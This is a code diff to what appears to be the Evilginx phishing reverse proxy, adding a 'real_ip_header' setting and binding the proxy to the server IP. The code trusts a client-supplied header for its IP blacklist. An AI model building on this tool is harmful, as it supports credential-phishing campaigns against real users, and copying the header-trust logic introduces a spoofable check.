Limit HTTP proxy listen address + add real_ip_header config option

core/config.go

@@ -56,11 +56,12 @@ type CertificatesConfig struct {
 }
 
 type GeneralConfig struct {
-	Domain      string `mapstructure:"domain" json:"domain" yaml:"domain"`
-	Ipv4        string `mapstructure:"ipv4" json:"ipv4" yaml:"ipv4"`
-	RedirectUrl string `mapstructure:"redirect_url" json:"redirect_url" yaml:"redirect_url"`
-	HttpsPort   int    `mapstructure:"https_port" json:"https_port" yaml:"https_port"`
-	DnsPort     int    `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"`
+	Domain       string `mapstructure:"domain" json:"domain" yaml:"domain"`
+	Ipv4         string `mapstructure:"ipv4" json:"ipv4" yaml:"ipv4"`
+	RedirectUrl  string `mapstructure:"redirect_url" json:"redirect_url" yaml:"redirect_url"`
+	HttpsPort    int    `mapstructure:"https_port" json:"https_port" yaml:"https_port"`
+	DnsPort      int    `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"`
+	RealIpHeader string `mapstructure:"real_ip_header" json:"real_ip_header" yaml:"real_ip_header"`
 }
 
 type Config struct {
@@ -224,6 +225,13 @@ func (c *Config) SetDnsPort(port int) {
 	c.cfg.WriteConfig()
 }
 
+func (c *Config) SetRealIpHeader(header_name string) {
+	c.general.RealIpHeader = header_name
+	c.cfg.Set(CFG_GENERAL, c.general)
+	log.Info("real IP header set to: %s", header_name)
+	c.cfg.WriteConfig()
+}
+
 func (c *Config) EnableProxy(enabled bool) {
 	c.proxyConfig.Enabled = enabled
 	c.cfg.Set(CFG_PROXY, c.proxyConfig)
@@ -665,6 +673,10 @@ func (c *Config) GetDnsPort() int {
 	return c.general.DnsPort
 }
 
+func (c *Config) GetRealIpHeader() string {
+	return c.general.RealIpHeader
+}
+
 func (c *Config) GetRedirectorsDir() string {
 	return c.redirectorsDir
 }

core/http_proxy.go

@@ -150,10 +150,22 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 			hiblue := color.New(color.FgHiBlue)
 
 			// handle ip blacklist
-			from_ip := req.RemoteAddr
-			if strings.Contains(from_ip, ":") {
-				from_ip = strings.Split(from_ip, ":")[0]
+			var from_ip string
+			if real_ip_header := cfg.GetRealIpHeader(); real_ip_header != "" {
+				log.Debug("looking for client IP in header: %s", real_ip_header)
+				real_ip := req.Header.Get(real_ip_header)
+				if real_ip != "" {
+					from_ip = real_ip
+					log.Debug("from_ip set: %s", from_ip)
+				}
+			}
+			if from_ip == "" {
+				from_ip = req.RemoteAddr
+				if strings.Contains(from_ip, ":") {
+					from_ip = strings.Split(from_ip, ":")[0]
+				}
 			}
+
 			if p.cfg.GetBlacklistMode() != "off" {
 				if p.bl.IsBlacklisted(from_ip) {
 					if p.bl.IsVerbose() {
@@ -186,8 +198,19 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 			//log.Debug("http: %s", req_url)
 
-			parts := strings.SplitN(req.RemoteAddr, ":", 2)
-			remote_addr := parts[0]
+			var remote_addr string
+			if real_ip_header := cfg.GetRealIpHeader(); real_ip_header != "" {
+				log.Debug("looking for client IP in header: %s", real_ip_header)
+				real_ip := req.Header.Get(real_ip_header)
+				if real_ip != "" {
+					remote_addr = real_ip
+					log.Debug("remote_addr set: %s", remote_addr)
+				}
+			}
+			if remote_addr == "" {
+				parts := strings.SplitN(req.RemoteAddr, ":", 2)
+				remote_addr = parts[0]
+			}
 
 			phishDomain, phished := p.getPhishDomain(req.Host)
 			if phished {

core/terminal.go

@@ -181,8 +181,8 @@ func (t *Terminal) DoWork() {
 func (t *Terminal) handleConfig(args []string) error {
 	pn := len(args)
 	if pn == 0 {
-		keys := []string{"domain", "ipv4", "https_port", "dns_port", "redirect_url"}
-		vals := []string{t.cfg.general.Domain, t.cfg.general.Ipv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.RedirectUrl}
+		keys := []string{"domain", "ipv4", "https_port", "dns_port", "real_ip_header", "redirect_url"}
+		vals := []string{t.cfg.general.Domain, t.cfg.general.Ipv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.RealIpHeader, t.cfg.general.RedirectUrl}
 		log.Printf("\n%s\n", AsRows(keys, vals))
 		return nil
 	} else if pn == 2 {
@@ -195,6 +195,9 @@ func (t *Terminal) handleConfig(args []string) error {
 		case "ipv4":
 			t.cfg.SetServerIP(args[1])
 			return nil
+		case "real_ip_header":
+			t.cfg.SetRealIpHeader(args[1])
+			return nil
 		case "redirect_url":
 			if len(args[1]) > 0 {
 				_, err := url.ParseRequestURI(args[1])
@@ -1009,10 +1012,11 @@ func (t *Terminal) handleLures(args []string) error {
 func (t *Terminal) createHelp() {
 	h, _ := NewHelp()
 	h.AddCommand("config", "general", "manage general configuration", "Shows values of all configuration variables and allows to change them.", LAYER_TOP,
-		readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ipv4"), readline.PcItem("redirect_url")))
+		readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ipv4"), readline.PcItem("real_ip_header"), readline.PcItem("redirect_url")))
 	h.AddSubCommand("config", nil, "", "show all configuration variables")
 	h.AddSubCommand("config", []string{"domain"}, "domain <domain>", "set base domain for all phishlets (e.g. evilsite.com)")
 	h.AddSubCommand("config", []string{"ipv4"}, "ipv4 <ip_address>", "set ipv4 external address of the current server")
+	h.AddSubCommand("config", []string{"real_ip_header"}, "real_ip_header <name>", "if set, read client IP from this HTTP header instead from source address of the TCP connection (useful if Evilginx is behind a reverse proxy)")
 	h.AddSubCommand("config", []string{"redirect_url"}, "redirect_url <url>", "change the url where all unauthorized requests will be redirected to (phishing urls will need to be regenerated)")
 
 	h.AddCommand("proxy", "general", "manage proxy configuration", "Configures proxy which will be used to proxy the connection to remote website", LAYER_TOP,

main.go

@@ -169,7 +169,7 @@ func main() {
 		return
 	}
 
-	hp, _ := core.NewHttpProxy("", cfg.GetHttpsPort(), cfg, crt_db, db, bl, *developer_mode)
+	hp, _ := core.NewHttpProxy(cfg.GetServerIP(), cfg.GetHttpsPort(), cfg, crt_db, db, bl, *developer_mode)
 	hp.Start()
 
 	t, err := core.NewTerminal(hp, cfg, crt_db, db, *developer_mode)